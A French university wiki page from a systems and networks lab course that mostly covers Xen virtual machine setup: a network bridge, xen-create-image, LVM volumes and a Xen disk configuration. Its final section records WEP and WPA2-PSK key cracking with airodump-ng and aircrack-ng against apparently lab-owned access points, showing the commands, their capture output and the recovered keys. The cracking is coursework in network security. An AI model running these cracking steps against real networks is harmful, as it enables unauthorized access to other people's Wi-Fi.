« Atelier SysRes SE4 2025/2026 E1 » : différence entre les versions
| Ligne 68 : | Ligne 68 : | ||
* '''<code>/home</code>''' : dossiers utilisateurs (fichiers perso, configs, projets, clés SSH…) | * '''<code>/home</code>''' : dossiers utilisateurs (fichiers perso, configs, projets, clés SSH…) | ||
* '''<code>/var</code>''' : données qui bougent beaucoup (logs, cache, bases de données, spool, etc.) | * '''<code>/var</code>''' : données qui bougent beaucoup (logs, cache, bases de données, spool, etc.) | ||
Cette séparation a plusieurs avantages très concrets : | |||
* '''Meilleure gestion de l’espace disque''' : tu peux dimensionner <code>/var</code> et <code>/home</code> indépendamment (et agrandir si besoin). | |||
* '''Moins de risques''' : si <code>/var</code> explose (logs qui partent en vrille, cache énorme…), ça évite de remplir tout le disque système et de “tuer” la VM. | |||
* '''Maintenance plus simple''' : sauvegarde/restauration ciblée (ex : sauvegarder <code>/home</code> sans prendre tout le système). | |||
* '''Organisation propre''' : chaque VM a ses volumes clairement identifiés. | |||
Pour chaque VM, on crée deux volumes logiques de 10 Go :<syntaxhighlight lang="bash"> | |||
lvcreate -L 10G -n SE4.<NomDeVM>.home virtual | |||
lvcreate -L 10G -n SE4.<NomDeVM>.var virtual | |||
</syntaxhighlight> | |||
* <code>lvcreate</code> : commande qui '''crée un volume logique''' | |||
* <code>-L 10G</code> : taille du volume (ici '''10 Go''') | |||
* <code>-n <nom></code> : nom du volume logique (d’où le <code>SE4.<NomDeVM>.home</code>) | |||
* <code>virtual</code> : le '''Volume Group''' dans lequel on crée le volume | |||
Ces volumes seront ensuite '''attachés à la VM''' comme des disques (ou partitions virtuelles), puis '''formatés''' et '''montés''' dans la VM : | |||
* le volume <code>.home</code> sera monté sur <code>/home</code> | |||
* le volume <code>.var</code> sera monté sur <code>/var</code> | |||
=== Fichier de configuration Xen === | |||
<syntaxhighlight lang="bash"> | |||
root = '/dev/xvda2 ro' | |||
disk = [ | |||
'file:/usr/local/xen/domains/SE4.Merteuil/disk.img,xvda2,w', | |||
'file:/usr/local/xen/domains/SE4.Merteuil/swap.img,xvda1,w', | |||
'phy:/dev/virtual/SE4.Merteuil.home,xvda3,w', | |||
'phy:/dev/virtual/SE4.Merteuil.var,xvdb1,w', | |||
] | |||
</syntaxhighlight> | |||
== Cassage de clé WIFI == | == Cassage de clé WIFI == | ||
Version du 22 février 2026 à 22:15
CRÉATION MACHINES VIRTUELLES
Il faut d'abord crée un "bridge" sur capbreton pour relier nos 3 machines virtuelles ensemble. Un "bridge" n'a rien de complexe, c'est un commutateur mais virtuel. C'est comme un commutateur physique avec des ports ethernet pour relier des machines ensemble mais il n'existe pas dans le monde physique seulement sur nos ordinateurs et VM. Pour cela, nous créons notre pont sur capbreton le commutateur/routeur dans la E304. Nous le faisons dans ce chemin : /etc/network/interfaces.d/SE42026_pcasimir_ahoudus
Veuillez faire en sorte de ne PAS modifier le fichier le fichier /etc/network/interfaces car c'est le fichier qui permet de configurer la connectivité de capbreton lui-même.
auto pont_Gercourt
iface pont_Gercourt inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
Ensuite, nous devons initialiser nos MV de services grâce à l'outil hyperviseur Xen.
Un hyperviseur, c’est le logiciel qui permet de faire tourner plusieurs “ordinateurs virtuels” (VM) sur un seul ordinateur physique.
Au lieu d’avoir 1 machine = 1 OS, tu as 1 machine physique = plusieurs OS (Linux, OpenWRT, Windows…) qui tournent en parallèle, chacun dans sa VM.
Un hyperviseur est “entre” le matériel et les VM, et il s’occupe de partager proprement :
- CPU : qui a le droit d’exécuter quand (ordonnancement)
- RAM : qui a droit à quelle mémoire (isolation, allocation)
- Disques : chaque VM a “son disque” (souvent un fichier
.img, LVM, etc.) - Réseau : chaque VM a une carte réseau virtuelle, connectée à un switch/bridge virtuel
- Isolation/Sécurité : une VM ne doit pas pouvoir casser les autres.
Xen, c’est un hyperviseur “bare-metal” très utilisé historiquement en serveur/cloud.
Dans Xen, toutes les VM sont des domains.
- Dom0 (Domain 0) : la VM “chef” (privilégiée)
- c’est elle qui a les drivers matériels
- c’est elle qui crée / détruit / configure les autres VM
- elle gère souvent le réseau (bridges/VLAN) et le stockage
- DomU : les VM “normales” (invitées)
- elles ont des périphériques virtuels
- elles passent souvent par Dom0 pour accéder au hardware
Petit schéma mental :
Matériel (CPU/RAM/NIC/Disques)
│
Xen
│
┌───────────┴───────────┐
│ │
Dom0 Dom1, Dom2, Dom3...
(admin + drivers) (VM Linux / OpenWRT / etc.)
Il leur faut plusieurs paramètres pour fonctionner selon nos critères.
root@capbreton:~# xen-create-image --hostname=SE4.Merteuil --dhcp --bridge=pont_Gercourt --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force
xen-create-image: Commande permettant de créer une nouvelle machine virtuelle Xen--hostname=SE4.Merteuil: Spécifie le nom d'hôte de la nouvelle MV créée. Ici, le nom d'hôte seraSE4.Atreus.--dhcp: Indique que la MV obtiendra automatiquement une adresse IP via DHCP. Aucune configuration statique d'adresse IP ne sera nécessaire. Vous devriez quand même configuré votre/etc/network/interfacedans votre VM pour qu'elle ait une adresse IPv4 sur votre commutateur virtuel/bridge.--bridge=bifrost: Précise l'utilisation du pont réseau nommébifrostpour connecter la machine virtuelle au réseau physique ou virtuel existant. Ceci permet une connexion directe de la VM au réseau.--dir=/usr/local/xen: Définit le répertoire dans lequel seront stockées les images disque et les fichiers associés de la MV. Ici, l'image sera placée dans le dossier/usr/local/xen.--size=10GB: Détermine la taille du disque virtuel pour cette MV. Dans cet exemple, le disque fera10 Go.--dist=daedalus: Indique la distribution du système d'exploitation à utiliser pour la MV. Ici, la distribution choisie s'appelledaedaluspour Debian.
--memory=2048M: Détermine la quantité de mémoire vive (RAM) allouée à la MV. Dans cet exemple, la MV aura2048 Mo(soit 2 Go) de RAM.
Volumes Logiques
Dans notre infra, on ne met pas tout le système d’une VM sur un seul “disque” géant. On sépare certains répertoires dans des volumes logiques (LVM) dédiés, notamment :
/home: dossiers utilisateurs (fichiers perso, configs, projets, clés SSH…)/var: données qui bougent beaucoup (logs, cache, bases de données, spool, etc.)
Cette séparation a plusieurs avantages très concrets :
- Meilleure gestion de l’espace disque : tu peux dimensionner
/varet/homeindépendamment (et agrandir si besoin). - Moins de risques : si
/varexplose (logs qui partent en vrille, cache énorme…), ça évite de remplir tout le disque système et de “tuer” la VM. - Maintenance plus simple : sauvegarde/restauration ciblée (ex : sauvegarder
/homesans prendre tout le système). - Organisation propre : chaque VM a ses volumes clairement identifiés.
Pour chaque VM, on crée deux volumes logiques de 10 Go :
lvcreate -L 10G -n SE4.<NomDeVM>.home virtual
lvcreate -L 10G -n SE4.<NomDeVM>.var virtual
lvcreate: commande qui crée un volume logique-L 10G: taille du volume (ici 10 Go)-n <nom>: nom du volume logique (d’où leSE4.<NomDeVM>.home)virtual: le Volume Group dans lequel on crée le volume
Ces volumes seront ensuite attachés à la VM comme des disques (ou partitions virtuelles), puis formatés et montés dans la VM :
- le volume
.homesera monté sur/home - le volume
.varsera monté sur/var
Fichier de configuration Xen
root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/SE4.Merteuil/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.Merteuil/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.Merteuil.home,xvda3,w',
'phy:/dev/virtual/SE4.Merteuil.var,xvdb1,w',
]
Cassage de clé WIFI
WEP
Sur un 1 terminal :
sudo airodump-ng wlan1 --write crackage_pcasimir/pcasimir --bssid 04:DA:D2:9C:50:50 -c4
Il faut laisser tourner le programme pendant un moment pour capturer un maximum d'IVs (environ 50*10³)
Ce que l'on voit :
CH 4 ][ Elapsed: 40 mins ][ 2026-02-10 16:07 ][ paused output
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
04:DA:D2:9C:50:50 -64 0 10771 48468 31 4 54e. WEP WEP cracotte01
BSSID STATION PWR Rate Lost Frames Notes Probes
04:DA:D2:9C:50:50 40:A5:EF:01:21:80 -73 0 -36e 621 58224
sur 2ème terminal :
Une fois qu'on a 50*10³ IV on fait :
sudo aircrack-ng -a1 -b 04:DA:D2:9C:50:50 crackage_pcasimir/pcasimir-01.cap -s
Résultat :
KB depth byte(vote)
0 1/ 2 B5(55552) 84(53504) 2B(52992) 2F(52480) A0(52480) BA(52224)
1 0/ 5 49(66304) E8(55552) 20(55296) 65(55296) 73(55296) 5F(53760)
2 41/ 2 E1(48640) 0E(48384) 3D(48384) 63(48384) 6C(48384) 9C(48384)
3 4/ 3 B3(53248) 7B(52992) 95(52992) 31(52736) 12(52224) FF(52224)
4 1/ 2 21(55552) 17(52480) 26(52224) B5(52224) 16(51968) C0(51712)
KEY FOUND! [ FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
WPA2-PSK
pcasimir@zabeth13:~$ sudo airodump-ng wlan1 --write crackage_pcasimir/airodumpWPA --bssid 44:AD:D9:5F:87:00 -c13
CH 13 ][ Elapsed: 1 hour 44 mins ][ 2026-02-10 18:41 ][ fixed channel wlan1: 4
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
44:AD:D9:5F:87:00 -58 0 28293 508 0 13 54e. WPA2 CCMP PSK kracotte01
BSSID STATION PWR Rate Lost Frames Notes Probes
pcasimir@zabeth13:~$ sudo aircrack-ng -a2 -b 44:AD:D9:5F:87:00 -w crackage_pcasimir/dico.txt crackage_pcasimir/airodumpWPA-01.cap
Aircrack-ng 1.7
[00:55:43] 66515032/100000000 keys tested (19870.44 k/s)
Time left: 28 minutes, 5 seconds 66.52%
KEY FOUND! [ 66689666 ]
Master Key : 3C A8 6A 6B 80 C3 36 12 EC D6 36 89 9F E3 F6 BC
D6 B2 24 8A 49 B4 9C 2A A3 6F 3E A0 96 15 8B F5
Transient Key : A0 53 57 7D 4B 67 FB 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : 52 DE 19 6D B0 E3 3B 2C 1A DA D3 F2 66 39 F2 DD